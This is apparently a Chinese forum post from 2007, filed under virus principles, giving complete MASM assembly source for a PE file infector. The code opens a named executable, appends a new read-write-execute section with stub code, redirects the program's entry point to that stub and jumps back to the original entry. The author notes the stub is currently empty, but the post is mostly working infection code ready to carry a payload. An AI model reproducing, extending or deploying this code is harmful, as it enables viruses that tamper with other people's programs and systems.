此程序借鉴不少高手程序 所以称不上原创 但也经过我重新写过和加了注释
实现功能将pe文件添加一个自己的节,将程序入口地址更改为自己节 自己节中程序执行完成后跳回原程序
此程序在插入代码中没做任何操作就直接返回原程序了 另外还有其他方式可插入自己代码 我并未添加
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib
;##########
InfectFile proto :dword
;#########
.code
;###############插入代码############################
VStart:
call abc
abc: pop ebp
sub ebp,offset abc
xor eax,eax
add eax,[ebp+HostEntry]
jmp eax
HostEntry dd ?
VEnd:
;######################################################
filename db "f:/a.exe" ;添加目标文件
write db 0
;################添加节的操作过程###########################
InfectFile proc _filename:dword
local hFile
local hMapping
local pMapping
local @dwAddCodeFile
local @dwAddCodeBase
local @dwEntry
;#######################打开文件##########################################################
invoke CreateFile,_filename,\
GENERIC_READ+GENERIC_WRITE,\
FILE_SHARE_READ+FILE_SHARE_WRITE,\
NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
.if eax == INVALID_HANDLE_VALUE
jmp exit2
.endif
mov hFile,eax
invoke CreateFileMapping,hFile,NULL,PAGE_READWRITE,0,0,0
mov hMapping,eax
invoke MapViewOfFile,hMapping,FILE_MAP_READ+FILE_MAP_WRITE,0,0,0
mov pMapping,eax
;########################找到pe头#########################################################
mov esi,eax
assume esi:ptr IMAGE_DOS_HEADER
cmp word ptr [esi],IMAGE_DOS_SIGNATURE
jnz Exit
add esi,[esi].e_lfanew
assume esi:ptr IMAGE_NT_HEADERS
cmp dword ptr [esi],IMAGE_NT_SIGNATURE
jnz Exit
;#######################添加新节##########################################################
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
mov HostEntry,eax ;保存原程序入口地址
;判断是否能够有空间插入新节
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx
add eax,sizeof IMAGE_NT_HEADERS
add eax,esi
mov edi,eax
add eax,sizeof IMAGE_SECTION_HEADER
sub eax,pMapping
cmp eax,[esi].OptionalHeader.SizeOfHeaders
ja Exit
;添加新节,edi为新节
inc [esi].FileHeader.NumberOfSections
mov ebx,edi
sub ebx,28h
assume edi:ptr IMAGE_SECTION_HEADER ;新节
assume ebx:ptr IMAGE_SECTION_HEADER ;旧节
mov dword ptr[edi],'fh.'
;#########################################################
;VirtualSize等于插入代码按SectionAlignment值对齐
push offset VEnd-offset VStart
pop [edi].Misc.VirtualSize
;SizeOfRawData=插入代码长度按FileAlignment值对齐
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax
;PointerToRawData
mov eax,[ebx].PointerToRawData ;上一节的PointerToRawData
add eax,[ebx].SizeOfRawData ;上一节的SizeOfRawData
mov [edi].PointerToRawData,eax ;PointerToRawData=前两个值相加
mov [edi].Characteristics,0E0000020h ;节属性设置为可读可写可执行
;AddressOfEntryPoint,使新节可以正确加载并首先执行
mov eax,[ebx].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[ebx].VirtualAddress
mov [edi].VirtualAddress,eax
;############修改入口地址################################################
push [edi].VirtualAddress
pop [esi].OptionalHeader.AddressOfEntryPoint
;更新SizeOfImage
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
;写入新节
invoke SetFilePointer,hFile,0,0,FILE_END
invoke WriteFile,hFile,offset VStart,[edi].SizeOfRawData,offset write,0
;########################结束#############################################################
Exit: invoke UnmapViewOfFile,pMapping
invoke CloseHandle,hMapping
exit2: invoke CloseHandle,hFile
ret
InfectFile endp
start:
invoke InfectFile,offset filename
invoke ExitProcess,NULL
end start
[此贴子已经被作者于2007-8-14 10:25:03编辑过]
病毒原理
